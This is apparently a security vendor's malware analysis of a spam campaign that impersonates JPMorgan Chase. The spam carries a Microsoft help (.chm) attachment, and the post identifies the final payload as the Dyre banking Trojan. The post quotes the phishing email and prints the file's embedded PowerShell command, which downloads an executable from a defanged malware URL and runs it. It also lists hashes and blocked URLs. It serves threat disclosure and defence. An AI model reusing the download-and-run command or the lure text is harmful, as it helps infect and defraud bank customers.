Microsoft Help File Malware Targets JPMorgan Chase Customers

A fresh malware sample was recently spotted using an attached Microsoft Compiled HTML (Help file) attached to spam messages. A Microsoft Help file is a binary file, which encompasses a set of HTML files; it usually has a .chm or .hlp extension.

The malicious help file malware analyzed – a .chm file – arrived via spam email posing as coming from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:

“Dear client,

As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.

Yours sincerely,

Chase Bank.” 

The email also has an attachment named “cannon.zip”. When this attachment is opened, it contains a .chm file named “Message.chm”.

Using a file viewer makes it clear that the .chm file is compressed.

Using a file viewer makes it clear that the .chm file is compressed.

If the .chm is opened, a command prompt opens up momentarily, providing a hint that something is happening in the background.

The help file contains this message.

The help file contains this message.

Viewing the HTML source shows that a PowerShell script was used to download and execute another file:

<PARAM name=”Item1″

value=”,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile(‘hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe’,’%TEMP%natmasla2.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%natmasla2.exe’)”>

<PARAM name=”Item2″ value=”273,1,1″>

The script will download a file from a known malware website and will be saved in the TEMP folder as natmasla2.exe. This file will immediately be executed using the ShellExecute command.

The first downloaded file then connects to a PHP resource and receives instructions to download a second file, containing Dyre/Dyreza. As noted recentlyDyre is a banking botnet Trojan with other capabilities.

MD5 Hashes:

  • chm: 14b166abd7279baa483cfc6e33fc5a3e
  • First file (exe): e821100cd69a0902d6ac5b1e56874692
  • Second file (php): 72841b43391206f983b0fa2ea0be331a

VIPRE Detections:

  • .chm is detected by VIPRE as CHM.Generic.a (v)
  • First download is detected by VIPRE as Malware!Drop
  • Second download is detected by VIPRE as Win32.Generic!BT

VIPRE blacklists both URLs:

  • First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
  • Second download: hxxp://nsgatewayllc.com/news/rss.php

The malicious spam containing this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan or Microsoft, or any of their systems have been compromised.

Credit: Dean Lawrence M. Bueno ­– Malware Researcher

Share via email Share

ThreatTrack Security Labs

About Author

ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.